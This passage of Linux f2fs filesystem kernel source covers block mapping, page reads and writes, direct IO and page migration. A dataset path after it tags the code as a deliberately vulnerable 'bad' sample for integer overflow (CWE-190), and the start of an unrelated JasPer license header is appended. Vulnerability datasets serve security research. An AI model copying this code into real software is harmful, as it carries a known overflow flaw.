f2fs_put_dnode(&dn);
unlock_out:
if (create) {
f2fs_unlock_op(sbi);
f2fs_balance_fs(sbi, dn.node_changed);
}
out:
trace_f2fs_map_blocks(inode, map, err);
return err;
}
static int __get_data_block(struct inode *inode, sector_t iblock,
struct buffer_head *bh, int create, int flag,
pgoff_t *next_pgofs)
{
struct f2fs_map_blocks map;
int err;
map.m_lblk = iblock;
map.m_len = bh->b_size >> inode->i_blkbits;
map.m_next_pgofs = next_pgofs;
err = f2fs_map_blocks(inode, &map, create, flag);
if (!err) {
map_bh(bh, inode->i_sb, map.m_pblk);
bh->b_state = (bh->b_state & ~F2FS_MAP_FLAGS) | map.m_flags;
bh->b_size = map.m_len << inode->i_blkbits;
}
return err;
}
static int get_data_block(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create, int flag,
pgoff_t *next_pgofs)
{
return __get_data_block(inode, iblock, bh_result, create,
flag, next_pgofs);
}
static int get_data_block_dio(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create)
{
return __get_data_block(inode, iblock, bh_result, create,
F2FS_GET_BLOCK_DIO, NULL);
}
static int get_data_block_bmap(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create)
{
/* Block number less than F2FS MAX BLOCKS */
if (unlikely(iblock >= F2FS_I_SB(inode)->max_file_blocks))
return -EFBIG;
return __get_data_block(inode, iblock, bh_result, create,
F2FS_GET_BLOCK_BMAP, NULL);
}
static inline sector_t logical_to_blk(struct inode *inode, loff_t offset)
{
return (offset >> inode->i_blkbits);
}
static inline loff_t blk_to_logical(struct inode *inode, sector_t blk)
{
return (blk << inode->i_blkbits);
}
int f2fs_fiemap(struct inode *inode, struct fiemap_extent_info *fieinfo,
u64 start, u64 len)
{
struct buffer_head map_bh;
sector_t start_blk, last_blk;
pgoff_t next_pgofs;
u64 logical = 0, phys = 0, size = 0;
u32 flags = 0;
int ret = 0;
ret = fiemap_check_flags(fieinfo, FIEMAP_FLAG_SYNC);
if (ret)
return ret;
if (f2fs_has_inline_data(inode)) {
ret = f2fs_inline_data_fiemap(inode, fieinfo, start, len);
if (ret != -EAGAIN)
return ret;
}
inode_lock(inode);
if (logical_to_blk(inode, len) == 0)
len = blk_to_logical(inode, 1);
start_blk = logical_to_blk(inode, start);
last_blk = logical_to_blk(inode, start + len - 1);
next:
memset(&map_bh, 0, sizeof(struct buffer_head));
map_bh.b_size = len;
ret = get_data_block(inode, start_blk, &map_bh, 0,
F2FS_GET_BLOCK_FIEMAP, &next_pgofs);
if (ret)
goto out;
/* HOLE */
if (!buffer_mapped(&map_bh)) {
start_blk = next_pgofs;
if (blk_to_logical(inode, start_blk) < blk_to_logical(inode,
F2FS_I_SB(inode)->max_file_blocks))
goto prep_next;
flags |= FIEMAP_EXTENT_LAST;
}
if (size) {
if (f2fs_encrypted_inode(inode))
flags |= FIEMAP_EXTENT_DATA_ENCRYPTED;
ret = fiemap_fill_next_extent(fieinfo, logical,
phys, size, flags);
}
if (start_blk > last_blk || ret)
goto out;
logical = blk_to_logical(inode, start_blk);
phys = blk_to_logical(inode, map_bh.b_blocknr);
size = map_bh.b_size;
flags = 0;
if (buffer_unwritten(&map_bh))
flags = FIEMAP_EXTENT_UNWRITTEN;
start_blk += logical_to_blk(inode, size);
prep_next:
cond_resched();
if (fatal_signal_pending(current))
ret = -EINTR;
else
goto next;
out:
if (ret == 1)
ret = 0;
inode_unlock(inode);
return ret;
}
static struct bio *f2fs_grab_bio(struct inode *inode, block_t blkaddr,
unsigned nr_pages)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct fscrypt_ctx *ctx = NULL;
struct bio *bio;
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) {
ctx = fscrypt_get_ctx(inode, GFP_NOFS);
if (IS_ERR(ctx))
return ERR_CAST(ctx);
/* wait the page to be moved by cleaning */
f2fs_wait_on_encrypted_page_writeback(sbi, blkaddr);
}
bio = bio_alloc(GFP_KERNEL, min_t(int, nr_pages, BIO_MAX_PAGES));
if (!bio) {
if (ctx)
fscrypt_release_ctx(ctx);
return ERR_PTR(-ENOMEM);
}
f2fs_target_device(sbi, blkaddr, bio);
bio->bi_end_io = f2fs_read_end_io;
bio->bi_private = ctx;
return bio;
}
/*
* This function was originally taken from fs/mpage.c, and customized for f2fs.
* Major change was from block_size == page_size in f2fs by default.
*/
static int f2fs_mpage_readpages(struct address_space *mapping,
struct list_head *pages, struct page *page,
unsigned nr_pages)
{
struct bio *bio = NULL;
unsigned page_idx;
sector_t last_block_in_bio = 0;
struct inode *inode = mapping->host;
const unsigned blkbits = inode->i_blkbits;
const unsigned blocksize = 1 << blkbits;
sector_t block_in_file;
sector_t last_block;
sector_t last_block_in_file;
sector_t block_nr;
struct f2fs_map_blocks map;
map.m_pblk = 0;
map.m_lblk = 0;
map.m_len = 0;
map.m_flags = 0;
map.m_next_pgofs = NULL;
for (page_idx = 0; nr_pages; page_idx++, nr_pages--) {
prefetchw(&page->flags);
if (pages) {
page = list_last_entry(pages, struct page, lru);
list_del(&page->lru);
if (add_to_page_cache_lru(page, mapping,
page->index,
readahead_gfp_mask(mapping)))
goto next_page;
}
block_in_file = (sector_t)page->index;
last_block = block_in_file + nr_pages;
last_block_in_file = (i_size_read(inode) + blocksize - 1) >>
blkbits;
if (last_block > last_block_in_file)
last_block = last_block_in_file;
/*
* Map blocks using the previous result first.
*/
if ((map.m_flags & F2FS_MAP_MAPPED) &&
block_in_file > map.m_lblk &&
block_in_file < (map.m_lblk + map.m_len))
goto got_it;
/*
* Then do more f2fs_map_blocks() calls until we are
* done with this page.
*/
map.m_flags = 0;
if (block_in_file < last_block) {
map.m_lblk = block_in_file;
map.m_len = last_block - block_in_file;
if (f2fs_map_blocks(inode, &map, 0,
F2FS_GET_BLOCK_READ))
goto set_error_page;
}
got_it:
if ((map.m_flags & F2FS_MAP_MAPPED)) {
block_nr = map.m_pblk + block_in_file - map.m_lblk;
SetPageMappedToDisk(page);
if (!PageUptodate(page) && !cleancache_get_page(page)) {
SetPageUptodate(page);
goto confused;
}
} else {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
unlock_page(page);
goto next_page;
}
/*
* This page will go to BIO. Do we need to send this
* BIO off first?
*/
if (bio && (last_block_in_bio != block_nr - 1 ||
!__same_bdev(F2FS_I_SB(inode), block_nr, bio))) {
submit_and_realloc:
__submit_bio(F2FS_I_SB(inode), bio, DATA);
bio = NULL;
}
if (bio == NULL) {
bio = f2fs_grab_bio(inode, block_nr, nr_pages);
if (IS_ERR(bio)) {
bio = NULL;
goto set_error_page;
}
bio_set_op_attrs(bio, REQ_OP_READ, 0);
}
if (bio_add_page(bio, page, blocksize, 0) < blocksize)
goto submit_and_realloc;
last_block_in_bio = block_nr;
goto next_page;
set_error_page:
SetPageError(page);
zero_user_segment(page, 0, PAGE_SIZE);
unlock_page(page);
goto next_page;
confused:
if (bio) {
__submit_bio(F2FS_I_SB(inode), bio, DATA);
bio = NULL;
}
unlock_page(page);
next_page:
if (pages)
put_page(page);
}
BUG_ON(pages && !list_empty(pages));
if (bio)
__submit_bio(F2FS_I_SB(inode), bio, DATA);
return 0;
}
static int f2fs_read_data_page(struct file *file, struct page *page)
{
struct inode *inode = page->mapping->host;
int ret = -EAGAIN;
trace_f2fs_readpage(page, DATA);
/* If the file has inline data, try to read it directly */
if (f2fs_has_inline_data(inode))
ret = f2fs_read_inline_data(inode, page);
if (ret == -EAGAIN)
ret = f2fs_mpage_readpages(page->mapping, NULL, page, 1);
return ret;
}
static int f2fs_read_data_pages(struct file *file,
struct address_space *mapping,
struct list_head *pages, unsigned nr_pages)
{
struct inode *inode = file->f_mapping->host;
struct page *page = list_last_entry(pages, struct page, lru);
trace_f2fs_readpages(inode, page, nr_pages);
/* If the file has inline data, skip readpages */
if (f2fs_has_inline_data(inode))
return 0;
return f2fs_mpage_readpages(mapping, pages, NULL, nr_pages);
}
int do_write_data_page(struct f2fs_io_info *fio)
{
struct page *page = fio->page;
struct inode *inode = page->mapping->host;
struct dnode_of_data dn;
int err = 0;
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, page->index, LOOKUP_NODE);
if (err)
return err;
fio->old_blkaddr = dn.data_blkaddr;
/* This page is already truncated */
if (fio->old_blkaddr == NULL_ADDR) {
ClearPageUptodate(page);
goto out_writepage;
}
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) {
gfp_t gfp_flags = GFP_NOFS;
/* wait for GCed encrypted page writeback */
f2fs_wait_on_encrypted_page_writeback(F2FS_I_SB(inode),
fio->old_blkaddr);
retry_encrypt:
fio->encrypted_page = fscrypt_encrypt_page(inode, fio->page,
PAGE_SIZE, 0,
fio->page->index,
gfp_flags);
if (IS_ERR(fio->encrypted_page)) {
err = PTR_ERR(fio->encrypted_page);
if (err == -ENOMEM) {
/* flush pending ios and wait for a while */
f2fs_flush_merged_bios(F2FS_I_SB(inode));
congestion_wait(BLK_RW_ASYNC, HZ/50);
gfp_flags |= __GFP_NOFAIL;
err = 0;
goto retry_encrypt;
}
goto out_writepage;
}
}
set_page_writeback(page);
/*
* If current allocation needs SSR,
* it had better in-place writes for updated data.
*/
if (unlikely(fio->old_blkaddr != NEW_ADDR &&
!is_cold_data(page) &&
!IS_ATOMIC_WRITTEN_PAGE(page) &&
need_inplace_update(inode))) {
rewrite_data_page(fio);
set_inode_flag(inode, FI_UPDATE_WRITE);
trace_f2fs_do_write_data_page(page, IPU);
} else {
write_data_page(&dn, fio);
trace_f2fs_do_write_data_page(page, OPU);
set_inode_flag(inode, FI_APPEND_WRITE);
if (page->index == 0)
set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
}
out_writepage:
f2fs_put_dnode(&dn);
return err;
}
static int f2fs_write_data_page(struct page *page,
struct writeback_control *wbc)
{
struct inode *inode = page->mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
loff_t i_size = i_size_read(inode);
const pgoff_t end_index = ((unsigned long long) i_size)
>> PAGE_SHIFT;
loff_t psize = (page->index + 1) << PAGE_SHIFT;
unsigned offset = 0;
bool need_balance_fs = false;
int err = 0;
struct f2fs_io_info fio = {
.sbi = sbi,
.type = DATA,
.op = REQ_OP_WRITE,
.op_flags = wbc_to_write_flags(wbc),
.page = page,
.encrypted_page = NULL,
};
trace_f2fs_writepage(page, DATA);
if (page->index < end_index)
goto write;
/*
* If the offset is out-of-range of file size,
* this page does not have to be written to disk.
*/
offset = i_size & (PAGE_SIZE - 1);
if ((page->index >= end_index + 1) || !offset)
goto out;
zero_user_segment(page, offset, PAGE_SIZE);
write:
if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
goto redirty_out;
if (f2fs_is_drop_cache(inode))
goto out;
/* we should not write 0'th page having journal header */
if (f2fs_is_volatile_file(inode) && (!page->index ||
(!wbc->for_reclaim &&
available_free_memory(sbi, BASE_CHECK))))
goto redirty_out;
/* we should bypass data pages to proceed the kworkder jobs */
if (unlikely(f2fs_cp_error(sbi))) {
mapping_set_error(page->mapping, -EIO);
goto out;
}
/* Dentry blocks are controlled by checkpoint */
if (S_ISDIR(inode->i_mode)) {
err = do_write_data_page(&fio);
goto done;
}
if (!wbc->for_reclaim)
need_balance_fs = true;
else if (has_not_enough_free_secs(sbi, 0, 0))
goto redirty_out;
err = -EAGAIN;
f2fs_lock_op(sbi);
if (f2fs_has_inline_data(inode))
err = f2fs_write_inline_data(inode, page);
if (err == -EAGAIN)
err = do_write_data_page(&fio);
if (F2FS_I(inode)->last_disk_size < psize)
F2FS_I(inode)->last_disk_size = psize;
f2fs_unlock_op(sbi);
done:
if (err && err != -ENOENT)
goto redirty_out;
out:
inode_dec_dirty_pages(inode);
if (err)
ClearPageUptodate(page);
if (wbc->for_reclaim) {
f2fs_submit_merged_bio_cond(sbi, NULL, page, 0, DATA, WRITE);
remove_dirty_inode(inode);
}
unlock_page(page);
f2fs_balance_fs(sbi, need_balance_fs);
if (unlikely(f2fs_cp_error(sbi)))
f2fs_submit_merged_bio(sbi, DATA, WRITE);
return 0;
redirty_out:
redirty_page_for_writepage(wbc, page);
if (!err)
return AOP_WRITEPAGE_ACTIVATE;
unlock_page(page);
return err;
}
/*
* This function was copied from write_cche_pages from mm/page-writeback.c.
* The major change is making write step of cold data page separately from
* warm/hot data page.
*/
static int f2fs_write_cache_pages(struct address_space *mapping,
struct writeback_control *wbc)
{
int ret = 0;
int done = 0;
struct pagevec pvec;
int nr_pages;
pgoff_t uninitialized_var(writeback_index);
pgoff_t index;
pgoff_t end; /* Inclusive */
pgoff_t done_index;
int cycled;
int range_whole = 0;
int tag;
int nwritten = 0;
pagevec_init(&pvec, 0);
if (wbc->range_cyclic) {
writeback_index = mapping->writeback_index; /* prev offset */
index = writeback_index;
if (index == 0)
cycled = 1;
else
cycled = 0;
end = -1;
} else {
index = wbc->range_start >> PAGE_SHIFT;
end = wbc->range_end >> PAGE_SHIFT;
if (wbc->range_start == 0 && wbc->range_end == LLONG_MAX)
range_whole = 1;
cycled = 1; /* ignore range_cyclic tests */
}
if (wbc->sync_mode == WB_SYNC_ALL || wbc->tagged_writepages)
tag = PAGECACHE_TAG_TOWRITE;
else
tag = PAGECACHE_TAG_DIRTY;
retry:
if (wbc->sync_mode == WB_SYNC_ALL || wbc->tagged_writepages)
tag_pages_for_writeback(mapping, index, end);
done_index = index;
while (!done && (index <= end)) {
int i;
nr_pages = pagevec_lookup_tag(&pvec, mapping, &index, tag,
min(end - index, (pgoff_t)PAGEVEC_SIZE - 1) + 1);
if (nr_pages == 0)
break;
for (i = 0; i < nr_pages; i++) {
struct page *page = pvec.pages[i];
if (page->index > end) {
done = 1;
break;
}
done_index = page->index;
lock_page(page);
if (unlikely(page->mapping != mapping)) {
continue_unlock:
unlock_page(page);
continue;
}
if (!PageDirty(page)) {
/* someone wrote it for us */
goto continue_unlock;
}
if (PageWriteback(page)) {
if (wbc->sync_mode != WB_SYNC_NONE)
f2fs_wait_on_page_writeback(page,
DATA, true);
else
goto continue_unlock;
}
BUG_ON(PageWriteback(page));
if (!clear_page_dirty_for_io(page))
goto continue_unlock;
ret = mapping->a_ops->writepage(page, wbc);
if (unlikely(ret)) {
/*
* keep nr_to_write, since vfs uses this to
* get # of written pages.
*/
if (ret == AOP_WRITEPAGE_ACTIVATE) {
unlock_page(page);
ret = 0;
continue;
}
done_index = page->index + 1;
done = 1;
break;
} else {
nwritten++;
}
if (--wbc->nr_to_write <= 0 &&
wbc->sync_mode == WB_SYNC_NONE) {
done = 1;
break;
}
}
pagevec_release(&pvec);
cond_resched();
}
if (!cycled && !done) {
cycled = 1;
index = 0;
end = writeback_index - 1;
goto retry;
}
if (wbc->range_cyclic || (range_whole && wbc->nr_to_write > 0))
mapping->writeback_index = done_index;
if (nwritten)
f2fs_submit_merged_bio_cond(F2FS_M_SB(mapping), mapping->host,
NULL, 0, DATA, WRITE);
return ret;
}
static int f2fs_write_data_pages(struct address_space *mapping,
struct writeback_control *wbc)
{
struct inode *inode = mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct blk_plug plug;
int ret;
/* deal with chardevs and other special file */
if (!mapping->a_ops->writepage)
return 0;
/* skip writing if there is no dirty page in this inode */
if (!get_dirty_pages(inode) && wbc->sync_mode == WB_SYNC_NONE)
return 0;
if (S_ISDIR(inode->i_mode) && wbc->sync_mode == WB_SYNC_NONE &&
get_dirty_pages(inode) < nr_pages_to_skip(sbi, DATA) &&
available_free_memory(sbi, DIRTY_DENTS))
goto skip_write;
/* skip writing during file defragment */
if (is_inode_flag_set(inode, FI_DO_DEFRAG))
goto skip_write;
/* during POR, we don't need to trigger writepage at all. */
if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
goto skip_write;
trace_f2fs_writepages(mapping->host, wbc, DATA);
blk_start_plug(&plug);
ret = f2fs_write_cache_pages(mapping, wbc);
blk_finish_plug(&plug);
/*
* if some pages were truncated, we cannot guarantee its mapping->host
* to detect pending bios.
*/
remove_dirty_inode(inode);
return ret;
skip_write:
wbc->pages_skipped += get_dirty_pages(inode);
trace_f2fs_writepages(mapping->host, wbc, DATA);
return 0;
}
static void f2fs_write_failed(struct address_space *mapping, loff_t to)
{
struct inode *inode = mapping->host;
loff_t i_size = i_size_read(inode);
if (to > i_size) {
truncate_pagecache(inode, i_size);
truncate_blocks(inode, i_size, true);
}
}
static int prepare_write_begin(struct f2fs_sb_info *sbi,
struct page *page, loff_t pos, unsigned len,
block_t *blk_addr, bool *node_changed)
{
struct inode *inode = page->mapping->host;
pgoff_t index = page->index;
struct dnode_of_data dn;
struct page *ipage;
bool locked = false;
struct extent_info ei;
int err = 0;
/*
* we already allocated all the blocks, so we don't need to get
* the block addresses when there is no need to fill the page.
*/
if (!f2fs_has_inline_data(inode) && len == PAGE_SIZE &&
!is_inode_flag_set(inode, FI_NO_PREALLOC))
return 0;
if (f2fs_has_inline_data(inode) ||
(pos & PAGE_MASK) >= i_size_read(inode)) {
f2fs_lock_op(sbi);
locked = true;
}
restart:
/* check inline_data */
ipage = get_node_page(sbi, inode->i_ino);
if (IS_ERR(ipage)) {
err = PTR_ERR(ipage);
goto unlock_out;
}
set_new_dnode(&dn, inode, ipage, ipage, 0);
if (f2fs_has_inline_data(inode)) {
if (pos + len <= MAX_INLINE_DATA) {
read_inline_data(page, ipage);
set_inode_flag(inode, FI_DATA_EXIST);
if (inode->i_nlink)
set_inline_node(ipage);
} else {
err = f2fs_convert_inline_page(&dn, page);
if (err)
goto out;
if (dn.data_blkaddr == NULL_ADDR)
err = f2fs_get_block(&dn, index);
}
} else if (locked) {
err = f2fs_get_block(&dn, index);
} else {
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn.data_blkaddr = ei.blk + index - ei.fofs;
} else {
/* hole case */
err = get_dnode_of_data(&dn, index, LOOKUP_NODE);
if (err || dn.data_blkaddr == NULL_ADDR) {
f2fs_put_dnode(&dn);
f2fs_lock_op(sbi);
locked = true;
goto restart;
}
}
}
/* convert_inline_page can make node_changed */
*blk_addr = dn.data_blkaddr;
*node_changed = dn.node_changed;
out:
f2fs_put_dnode(&dn);
unlock_out:
if (locked)
f2fs_unlock_op(sbi);
return err;
}
static int f2fs_write_begin(struct file *file, struct address_space *mapping,
loff_t pos, unsigned len, unsigned flags,
struct page **pagep, void **fsdata)
{
struct inode *inode = mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct page *page = NULL;
pgoff_t index = ((unsigned long long) pos) >> PAGE_SHIFT;
bool need_balance = false;
block_t blkaddr = NULL_ADDR;
int err = 0;
trace_f2fs_write_begin(inode, pos, len, flags);
/*
* We should check this at this moment to avoid deadlock on inode page
* and #0 page. The locking rule for inline_data conversion should be:
* lock_page(page #0) -> lock_page(inode_page)
*/
if (index != 0) {
err = f2fs_convert_inline_inode(inode);
if (err)
goto fail;
}
repeat:
page = grab_cache_page_write_begin(mapping, index, flags);
if (!page) {
err = -ENOMEM;
goto fail;
}
*pagep = page;
err = prepare_write_begin(sbi, page, pos, len,
&blkaddr, &need_balance);
if (err)
goto fail;
if (need_balance && has_not_enough_free_secs(sbi, 0, 0)) {
unlock_page(page);
f2fs_balance_fs(sbi, true);
lock_page(page);
if (page->mapping != mapping) {
/* The page got truncated from under us */
f2fs_put_page(page, 1);
goto repeat;
}
}
f2fs_wait_on_page_writeback(page, DATA, false);
/* wait for GCed encrypted page writeback */
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode))
f2fs_wait_on_encrypted_page_writeback(sbi, blkaddr);
if (len == PAGE_SIZE || PageUptodate(page))
return 0;
if (!(pos & (PAGE_SIZE - 1)) && (pos + len) >= i_size_read(inode)) {
zero_user_segment(page, len, PAGE_SIZE);
return 0;
}
if (blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
SetPageUptodate(page);
} else {
struct bio *bio;
bio = f2fs_grab_bio(inode, blkaddr, 1);
if (IS_ERR(bio)) {
err = PTR_ERR(bio);
goto fail;
}
bio->bi_opf = REQ_OP_READ;
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE) {
bio_put(bio);
err = -EFAULT;
goto fail;
}
__submit_bio(sbi, bio, DATA);
lock_page(page);
if (unlikely(page->mapping != mapping)) {
f2fs_put_page(page, 1);
goto repeat;
}
if (unlikely(!PageUptodate(page))) {
err = -EIO;
goto fail;
}
}
return 0;
fail:
f2fs_put_page(page, 1);
f2fs_write_failed(mapping, pos + len);
return err;
}
static int f2fs_write_end(struct file *file,
struct address_space *mapping,
loff_t pos, unsigned len, unsigned copied,
struct page *page, void *fsdata)
{
struct inode *inode = page->mapping->host;
trace_f2fs_write_end(inode, pos, len, copied);
/*
* This should be come from len == PAGE_SIZE, and we expect copied
* should be PAGE_SIZE. Otherwise, we treat it with zero copied and
* let generic_perform_write() try to copy data again through copied=0.
*/
if (!PageUptodate(page)) {
if (unlikely(copied != len))
copied = 0;
else
SetPageUptodate(page);
}
if (!copied)
goto unlock_out;
set_page_dirty(page);
if (pos + copied > i_size_read(inode))
f2fs_i_size_write(inode, pos + copied);
unlock_out:
f2fs_put_page(page, 1);
f2fs_update_time(F2FS_I_SB(inode), REQ_TIME);
return copied;
}
static int check_direct_IO(struct inode *inode, struct iov_iter *iter,
loff_t offset)
{
unsigned blocksize_mask = inode->i_sb->s_blocksize - 1;
if (offset & blocksize_mask)
return -EINVAL;
if (iov_iter_alignment(iter) & blocksize_mask)
return -EINVAL;
return 0;
}
static ssize_t f2fs_direct_IO(struct kiocb *iocb, struct iov_iter *iter)
{
struct address_space *mapping = iocb->ki_filp->f_mapping;
struct inode *inode = mapping->host;
size_t count = iov_iter_count(iter);
loff_t offset = iocb->ki_pos;
int rw = iov_iter_rw(iter);
int err;
err = check_direct_IO(inode, iter, offset);
if (err)
return err;
if (__force_buffered_io(inode, rw))
return 0;
trace_f2fs_direct_IO_enter(inode, offset, count, rw);
down_read(&F2FS_I(inode)->dio_rwsem[rw]);
err = blockdev_direct_IO(iocb, inode, iter, get_data_block_dio);
up_read(&F2FS_I(inode)->dio_rwsem[rw]);
if (rw == WRITE) {
if (err > 0)
set_inode_flag(inode, FI_UPDATE_WRITE);
else if (err < 0)
f2fs_write_failed(mapping, offset + count);
}
trace_f2fs_direct_IO_exit(inode, offset, count, rw, err);
return err;
}
void f2fs_invalidate_page(struct page *page, unsigned int offset,
unsigned int length)
{
struct inode *inode = page->mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
if (inode->i_ino >= F2FS_ROOT_INO(sbi) &&
(offset % PAGE_SIZE || length != PAGE_SIZE))
return;
if (PageDirty(page)) {
if (inode->i_ino == F2FS_META_INO(sbi)) {
dec_page_count(sbi, F2FS_DIRTY_META);
} else if (inode->i_ino == F2FS_NODE_INO(sbi)) {
dec_page_count(sbi, F2FS_DIRTY_NODES);
} else {
inode_dec_dirty_pages(inode);
remove_dirty_inode(inode);
}
}
/* This is atomic written page, keep Private */
if (IS_ATOMIC_WRITTEN_PAGE(page))
return;
set_page_private(page, 0);
ClearPagePrivate(page);
}
int f2fs_release_page(struct page *page, gfp_t wait)
{
/* If this is dirty page, keep PagePrivate */
if (PageDirty(page))
return 0;
/* This is atomic written page, keep Private */
if (IS_ATOMIC_WRITTEN_PAGE(page))
return 0;
set_page_private(page, 0);
ClearPagePrivate(page);
return 1;
}
/*
* This was copied from __set_page_dirty_buffers which gives higher performance
* in very high speed storages. (e.g., pmem)
*/
void f2fs_set_page_dirty_nobuffers(struct page *page)
{
struct address_space *mapping = page->mapping;
unsigned long flags;
if (unlikely(!mapping))
return;
spin_lock(&mapping->private_lock);
lock_page_memcg(page);
SetPageDirty(page);
spin_unlock(&mapping->private_lock);
spin_lock_irqsave(&mapping->tree_lock, flags);
WARN_ON_ONCE(!PageUptodate(page));
account_page_dirtied(page, mapping);
radix_tree_tag_set(&mapping->page_tree,
page_index(page), PAGECACHE_TAG_DIRTY);
spin_unlock_irqrestore(&mapping->tree_lock, flags);
unlock_page_memcg(page);
__mark_inode_dirty(mapping->host, I_DIRTY_PAGES);
return;
}
static int f2fs_set_data_page_dirty(struct page *page)
{
struct address_space *mapping = page->mapping;
struct inode *inode = mapping->host;
trace_f2fs_set_page_dirty(page, DATA);
if (!PageUptodate(page))
SetPageUptodate(page);
if (f2fs_is_atomic_file(inode) && !f2fs_is_commit_atomic_write(inode)) {
if (!IS_ATOMIC_WRITTEN_PAGE(page)) {
register_inmem_page(inode, page);
return 1;
}
/*
* Previously, this page has been registered, we just
* return here.
*/
return 0;
}
if (!PageDirty(page)) {
f2fs_set_page_dirty_nobuffers(page);
update_dirty_page(inode, page);
return 1;
}
return 0;
}
static sector_t f2fs_bmap(struct address_space *mapping, sector_t block)
{
struct inode *inode = mapping->host;
if (f2fs_has_inline_data(inode))
return 0;
/* make sure allocating whole blocks */
if (mapping_tagged(mapping, PAGECACHE_TAG_DIRTY))
filemap_write_and_wait(mapping);
return generic_block_bmap(mapping, block, get_data_block_bmap);
}
#ifdef CONFIG_MIGRATION
#include <linux/migrate.h>
int f2fs_migrate_page(struct address_space *mapping,
struct page *newpage, struct page *page, enum migrate_mode mode)
{
int rc, extra_count;
struct f2fs_inode_info *fi = F2FS_I(mapping->host);
bool atomic_written = IS_ATOMIC_WRITTEN_PAGE(page);
BUG_ON(PageWriteback(page));
/* migrating an atomic written page is safe with the inmem_lock hold */
if (atomic_written && !mutex_trylock(&fi->inmem_lock))
return -EAGAIN;
/*
* A reference is expected if PagePrivate set when move mapping,
* however F2FS breaks this for maintaining dirty page counts when
* truncating pages. So here adjusting the 'extra_count' make it work.
*/
extra_count = (atomic_written ? 1 : 0) - page_has_private(page);
rc = migrate_page_move_mapping(mapping, newpage,
page, NULL, mode, extra_count);
if (rc != MIGRATEPAGE_SUCCESS) {
if (atomic_written)
mutex_unlock(&fi->inmem_lock);
return rc;
}
if (atomic_written) {
struct inmem_pages *cur;
list_for_each_entry(cur, &fi->inmem_pages, list)
if (cur->page == page) {
cur->page = newpage;
break;
}
mutex_unlock(&fi->inmem_lock);
put_page(page);
get_page(newpage);
}
if (PagePrivate(page))
SetPagePrivate(newpage);
set_page_private(newpage, page_private(page));
migrate_page_copy(newpage, page);
return MIGRATEPAGE_SUCCESS;
}
#endif
const struct address_space_operations f2fs_dblock_aops = {
.readpage = f2fs_read_data_page,
.readpages = f2fs_read_data_pages,
.writepage = f2fs_write_data_page,
.writepages = f2fs_write_data_pages,
.write_begin = f2fs_write_begin,
.write_end = f2fs_write_end,
.set_page_dirty = f2fs_set_data_page_dirty,
.invalidatepage = f2fs_invalidate_page,
.releasepage = f2fs_release_page,
.direct_IO = f2fs_direct_IO,
.bmap = f2fs_bmap,
#ifdef CONFIG_MIGRATION
.migratepage = f2fs_migrate_page,
#endif
};
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3028_0 |
crossvul-cpp_data_good_5412_0 | /*
* Copyright (c) 1999-2000 Image Power, Inc. and the University of
* British Columbia.
* Copyright (c) 2001-2003 Michael David Adams.
* All rights reserved.
*/
/* __START_OF_JASPER_LICENSE__
*
* JasPer License Version 2.0
*
* Copyright (c) 2001-2006 Michael David Adams
* Copyright (c) 1999-2000 Image Power, Inc.
* Copyright (c) 1999-2000 The University of British Columbia
*
* All rights reserved.
*
* Permission is hereby granted, free of charge, to any person (the
* "User") obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without restriction,
* including without limitation the rights to use, copy, modify, merge,
* publish, distribute, and/or sell copies of the Software, and to permit
* persons to whom the Software is furnished to do so, subject to the
* following conditions:
*
* 1. The above copyright notices and this permission notice (which
* includes the disclaimer below) shall be included in all copies or
* substantial portions of the Software.
*
* 2. The name of a copyright holder shall not be used to endorse or
* promote products derived from the Software without specific prior
* written permission.
*
* THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS
* LICENSE. NO USE OF THE SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER
* THIS DISCLAIMER. THE SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS
* "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
* BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
* PARTICULAR PURPOSE AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. IN NO
* EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL
* INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING
* FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
* NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
* WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. NO ASSURANCES ARE
* PROVIDED BY THE COPYRIGHT HOLDERS THAT THE SOFTWARE DOES NOT INFRINGE
* THE PATENT OR OTHER INTELLECTUAL PROPERTY RIGHTS OF ANY OTHER ENTITY.
* EACH COPYRIGHT HOLDER DISCLAIMS ANY LIABILITY TO THE USER FOR CLAIMS
* BROUGHT BY ANY OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL
* PROPERTY RIGHTS OR OTHERWISE. AS A CONDITION TO EXERCISING THE RIGHTS
* GRANTED HEREUNDER, EACH USER HEREBY ASSUMES SOLE RESPONSIBILITY TO SECURE
* ANY OTHER INTELLECTUAL PROPERTY RIGHTS NEEDED, IF ANY. THE SOFTWARE
